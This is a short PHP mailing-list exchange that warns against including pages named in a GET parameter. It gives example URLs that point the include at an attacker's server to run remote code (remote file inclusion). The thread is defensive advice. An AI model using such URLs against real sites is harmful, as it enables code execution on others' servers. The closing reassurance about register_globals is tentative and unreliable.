I don't think I'd let someone pass any page they wanted via a get and just include that page.
If you have URL fopen wrappers on I can create a page on my server and include it to your page and pretty much execute any code I want on your server.
example:
http://www.yourdomain.com?yourscript.php?page=http://mydomain.com/myscript.p hp
Now my code is included in your page and executed. Do you really trust me to only have nice code in my page?
This is a very good point. Definitely make sure you know what you are including. If you are predefining the names of the files to be included and then using $_GET['page'] to pass the name of the variable (which was being done in files.inc.php), you have control over the files that are included. Nevertheless, be careful. If you have register_globals on I am not sure what would happen if you had:
http://yousite.com/index.php?page=home&home=http://othersite.com/bad.php
Although I think you would still be ok.
- Brad
-- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
